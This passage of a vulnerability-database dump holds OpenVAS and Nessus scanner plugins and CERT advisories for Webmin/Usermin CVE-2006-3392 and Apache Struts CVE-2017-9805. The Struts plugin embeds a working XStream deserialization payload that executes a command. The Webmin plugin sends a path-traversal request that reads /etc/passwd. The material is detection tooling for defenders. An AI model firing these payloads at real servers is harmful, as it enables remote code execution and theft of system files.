E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"webmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.290\")<0) {\n txt += 'Package webmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"usermin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.220\")<0) {\n txt += 'Package usermin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-11.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57861", "id": "OPENVAS:57861", "title": "Gentoo Security Advisory GLSA 200608-11 (webmin/usermin)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Webmin and Usermin are vulnerable to an arbitrary file disclosure through a\nspecially crafted URL.\";\ntag_solution = \"All Webmin users should update to the latest stable version:\n\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/webmin-1.290'\n\nAll Usermin users should update to the latest stable version:\n\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/usermin-1.220'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=138552\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-11.\";\n\n \n\nif(description)\n{\n script_id(57861);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3392\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200608-11 (webmin/usermin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-admin/webmin\", unaffected: make_list(\"ge 1.290\"), vulnerable: make_list(\"lt 1.290\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"app-admin/usermin\", unaffected: make_list(\"ge 1.220\"), vulnerable: make_list(\"lt 1.220\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-05-08T18:48:38", "bulletinFamily": "scanner", "description": "This host is running Apache Struts and is\n prone to remote code execution vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2017-09-07T00:00:00", "id": "OPENVAS:1361412562310811730", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811730", "title": "Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811730\");\n script_version(\"2020-05-06T06:57:16+0000\");\n script_cve_id(\"CVE-2017-9805\");\n script_bugtraq_id(100609);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 06:57:16 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-07 16:39:09 +0530 (Thu, 07 Sep 2017)\");\n script_name(\"Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-052.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check\n whether we are able to execute arbitrary code or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within the REST plugin which\n is using a XStreamHandler with an instance of XStream for deserialization\n without any type filtering.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow\n an attacker to execute arbitrary code in the context of the affected application.\n Failed exploit attempts will likely result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.5 through 2.5.12,\n 2.1.2 through 2.3.33.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.5.13\n or 2.3.34 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port(default:8080);\nhost = http_host_name(dont_add_port:TRUE);\n\nforeach ext(make_list(\"action\", \"do\", \"jsp\")){\n exts = http_get_kb_file_extensions(port:port, host:host, ext:ext);\n if(exts && is_array(exts)){\n found = TRUE;\n break;\n }\n}\n\nif( ! found )\n exit( 0 );\n\nhost = http_host_name(port:port);\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nif(host_runs(\"Windows\") == \"yes\"){\n COMMAND = '<string>ping</string><string>-n</string><string>3</string><string>' + this_host() + '</string>';\n win = TRUE;\n}else{\n ##For Linux and Unix platform\n vtstrings = get_vt_strings();\n check = vtstring[\"ping_string\"];\n pattern = hexstr(check);\n COMMAND = '<string>ping</string><string>-c</string><string>3</string><string>-p</string><string>' + pattern + '</string><string>' + this_host() + '</string>';\n}\n\ndata =\n' <map>\n <entry>\n <jdk.nashorn.internal.objects.NativeString>\n <flags>0</flags>\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n <dataHandler>\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n <is class=\"javax.crypto.CipherInputStream\">\n <cipher class=\"javax.crypto.NullCipher\">\n <initialized>false</initialized>\n <opmode>0</opmode>\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"java.util.Collections$EmptyIterator\"/>\n <next class=\"java.lang.ProcessBuilder\">\n <command>\n ' + COMMAND + '\n </command>\n <redirectErrorStream>false</redirectErrorStream>\n </next>\n </iter>\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n <method>\n <class>java.lang.ProcessBuilder</class>\n <name>start</name>\n <parameter-types/>\n </method>\n <name>foo</name>\n </filter>\n <next class=\"string\">foo</next>\n </serviceIterator>\n <lock/>\n </cipher>\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n <ibuffer/>\n <done>false</done>\n <ostart>0</ostart>\n <ofinish>0</ofinish>\n <closed>false</closed>\n </is>\n <consumed>false</consumed>\n </dataSource>\n <transferFlavors/>\n </dataHandler>\n <dataLen>0</dataLen>\n </value>\n </jdk.nashorn.internal.objects.NativeString>\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n <entry>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n </map>';\nlen = strlen(data);\nurl = '/struts2-rest-showcase/orders/3';\nreq = http_post_put_req( port: port,\n url: url,\n data: data,\n add_headers: make_array( 'Content-Type', 'application/xml'));\n\nres = send_capture( socket:soc,\n data:req,\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\nclose(soc);\n\nif(res && (win || check >< res)){\n report = \"It was possible to execute command remotely at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + \" with the command '\" + COMMAND + \"'.\";\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-05-27T18:57:30", "bulletinFamily": "info", "description": "### Overview \n\nWebmin and Usermin do not properly sanitize user input. This vulnerability may allow a remote, unauthenticated user to view any file on the system running Webmin or Usermin. \n\n### Description \n\n**Webmin** \n \nWebmin is popular web-based administration tool for Unix and Linux servers that allows system administrators to make changes to system processes. \n \n**Usermin** \n \nUsermin offers an interface similar to Webmin, but is designed for regular users who are not responsible for system administration tasks. \n \n**The Problem** \n \nThere is an input validation vulnerability in Usermin and Webmin that could allow a remote, unauthenticated attacker could view any file on the computer running Webmin or Usermin. \n \n--- \n \n### Impact \n\nAn attacker could read any file on the computer running Webmin or Usermin. \n \n--- \n \n### Solution \n\n**Upgrade** \nUsermin version Version 1.220 and Webmin version 1.290 have been released to address this vulnerability. \n \n--- \n \n \n**Restrict Access** \n \nRestrict access to the Webmin and Usermin servers to trusted hosts. Note that in addition to firewall and VPN access control methods, both Webmin and usermin can use SSH tunneling to provide additional layers of encryption and authorization. \n \n--- \n \n### Vendor Information\n\n999601\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Webmin Unknown\n\nUpdated: July 07, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis vulnerability was reported by the Webmin team.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23999601 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://secunia.com/advisories/20892/>\n * <http://www.webmin.com/uchanges-1.210.html>\n * [http://club.mandriva.com/xwiki/bin/KB/SecureSssh5?xpage=code&amp;](<http://club.mandriva.com/xwiki/bin/KB/SecureSssh5?xpage=code&>)\n\n### Acknowledgements\n\nThe Webmin team has reported this vulnerability.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3392](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3392>) \n---|--- \n**Severity Metric:** | 9.53 \n**Date Public:** | 2006-06-30 \n**Date First Published:** | 2006-07-07 \n**Date Last Updated: ** | 2006-08-01 18:09 UTC \n**Document Revision: ** | 32 \n", "modified": "2006-08-01T18:09:00", "published": "2006-07-07T00:00:00", "id": "VU:999601", "href": "https://www.kb.cert.org/vuls/id/999601", "type": "cert", "title": "Webmin and Usermin fail to sanitize user input", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-27T18:55:23", "bulletinFamily": "info", "description": "### Overview \n\nApache Struts 2 framework, versions 2.5 to 2.5.12, with REST plugin insecurely deserializes untrusted XML data. A remote, unauthenticated attacker can leverage this vulnerability to execute arbitrary code in the context of the Struts application.\n\n### Description \n\n[**CWE-502**](<https://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data** \\- CVE-2017-9805\n\nIn Apache Struts 2 framework, versions 2.5 to 2.5.12, the REST plugin uses `XStreamHandler` with an instance of XStream to deserialize XML data. Because there is no type filtering, a remote, unauthenticated attacker may send a specially crafted XML payload to execute arbitrary code in the context of the Struts application. \n \nRefer to the researcher's [blog post](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>) for more information about this vulnerability. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/8924/files>) with exploit code is publicly available. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may send a specially crafted XML payload to execute arbitrary code on vulnerable servers in the context of the Struts application. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThe vendor has released version 2.5.13 to address this vulnerability. No workaround is possible [according to the vendor](<https://struts.apache.org/docs/s2-052.html>), so patching is strongly recommended. \n \n--- \n \n**Remove or limit the REST plugin** \n \nIf it is not used, consider removing the REST plugin. Per the vendor, it is also possible to limit its functionality to normal server pages or JSON with the following configuration change in `struts.xml`: \n \n`<constant name=\"struts.action.extension\" value=\"xhtml,,json\" />` \n \n--- \n \n### Vendor Information\n\n112992\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apache Struts Affected\n\nUpdated: September 06, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://struts.apache.org/docs/s2-052.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.3 | E:F/RL:OF/RC:C \nEnvironmental | 8.3 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://cwe.mitre.org/data/definitions/502.html>\n * <https://struts.apache.org/docs/s2-052.html>\n * <https://lgtm.com/blog/apache_struts_CVE-2017-9805>\n * <https://github.com/rapid7/metasploit-framework/pull/8924/files>\n\n### Acknowledgements\n\nMan Yue Mo of lgtm is credited with reporting this vulnerability to the vendor.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-9805](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9805>) \n---|--- \n**Date Public:** | 2017-09-05 \n**Date First Published:** | 2017-09-06 \n**Date Last Updated: ** | 2017-09-06 13:16 UTC \n**Document Revision: ** | 14 \n", "modified": "2017-09-06T13:16:00", "published": "2017-09-06T00:00:00", "id": "VU:112992", "href": "https://www.kb.cert.org/vuls/id/112992", "type": "cert", "title": "Apache Struts 2 framework REST plugin insecurely deserializes untrusted XML data", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-03-18T03:32:07", "bulletinFamily": "scanner", "description": "The version of Webmin installed on the remote host is affected by an\ninformation disclosure flaw due to a flaw in the Perl script\n", "modified": "2006-06-30T00:00:00", "id": "WEBMIN_1290.NASL", "href": "https://www.tenable.com/plugins/nessus/21785", "published": "2006-06-30T00:00:00", "title": "Webmin 'miniserv.pl' Arbitrary File Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21785);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/26\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n\n script_name(english:\"Webmin 'miniserv.pl' Arbitrary File Disclosure\");\n script_summary(english:\"Tries to read a local file using 'miniserv.pl'.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server is affected by an information disclosure flaw.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Webmin installed on the remote host is affected by an\ninformation disclosure flaw due to a flaw in the Perl script\n'miniserv.pl'. This flaw could allow a remote, unauthenticated\nattacker to read arbitrary files on the affected host, subject to the\nprivileges of the web server user .\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.webmin.com/changes-1.290.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Webmin 1.290 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-3392\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:webmin:webmin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"webmin.nasl\");\n script_require_keys(\"www/webmin\");\n script_require_ports(\"Services/www\", 10000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\napp = 'Webmin';\nport = get_http_port(default:10000, embedded: TRUE);\nget_kb_item_or_exit('www/'+port+'/webmin');\n\ndir = \"/\";\ninstall_url = build_url(port:port, qs:dir);\n\n# Try to exploit the flaw to read a local file.\nfile = \"/etc/passwd\";\nexploit = \"unauthenticated\" + crap(data:\"/..%01\", length:60) + file;\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + exploit,\n exit_on_fail : TRUE\n);\n\n# There's a problem if there's an entry for root.\nif (egrep(pattern:\"root:.*:0:[01]:\", string:res[2]))\n{\n report = NULL;\n attach_file = NULL;\n output = NULL;\n req = install_url + exploit;\n request = NULL;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to exploit this issue with the following URL : ' +\n '\\n' +\n '\\n' + req +\n '\\n';\n\n if (report_verbosity > 1)\n {\n output = data_protection::redact_etc_passwd(output:res[2]);\n attach_file = file;\n request = make_list(req);\n }\n }\n\n security_report_v4(port:port,\n extra:report,\n severity:SECURITY_WARNING,\n request:request,\n file:attach_file,\n output:output);\n\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-01T02:01:47", "bulletinFamily": "scanner", "description": "The webmin development team reports :\n\nAn attacker without a login to Webmin can read the contents of any\nfile on the server using a specially crafted URL. All users should\nupgrade to version 1.290 as soon as possible, or setup IP access\ncontrol in Webmin.", "modified": "2020-06-02T00:00:00", "id": "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL", "href": "https://www.tenable.com/plugins/nessus/21789", "published": "2006-07-03T00:00:00", "title": "FreeBSD : webmin, usermin -- arbitrary file disclosure vulnerability (227475c2-09cb-11db-9156-000e0c2e438a)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21789);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/08/02 13:32:38\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n\n script_name(english:\"FreeBSD : webmin, usermin -- arbitrary file disclosure vulnerability (227475c2-09cb-11db-9156-000e0c2e438a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The webmin development team reports :\n\nAn attacker without a login to Webmin can read the contents of any\nfile on the server using a specially crafted URL. All users should\nupgrade to version 1.290 as soon as possible, or setup IP access\ncontrol in Webmin.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.webmin.com/security.html\"\n );\n # https://vuxml.freebsd.org/freebsd/227475c2-09cb-11db-9156-000e0c2e438a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7445dda8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:usermin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webmin<1.290\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"usermin<1.220\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-01T02:09:46", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200608-11\n(Webmin, Usermin: File Disclosure)\n\n A vulnerability in both Webmin and Usermin has been discovered by Kenny\n Chen, wherein simplify_path is called before the HTML is decoded.\n \nImpact :\n\n A non-authenticated user can read any file on the server using a\n specially crafted URL.\n \nWorkaround :\n\n For a temporary workaround, IP Access Control can be setup on Webmin\n and Usermin.", "modified": "2020-06-02T00:00:00", "id": "GENTOO_GLSA-200608-11.NASL", "href": "https://www.tenable.com/plugins/nessus/22169", "published": "2006-08-07T00:00:00", "title": "GLSA-200608-11 : Webmin, Usermin: File Disclosure", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22169);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:43\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_xref(name:\"GLSA\", value:\"200608-11\");\n\n script_name(english:\"GLSA-200608-11 : Webmin, Usermin: File Disclosure\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-11\n(Webmin, Usermin: File Disclosure)\n\n A vulnerability in both Webmin and Usermin has been discovered by Kenny\n Chen, wherein simplify_path is called before the HTML is decoded.\n \nImpact :\n\n A non-authenticated user can read any file on the server using a\n specially crafted URL.\n \nWorkaround :\n\n For a temporary workaround, IP Access Control can be setup on Webmin\n and Usermin.\"\n );\n script_set_attribute(\n 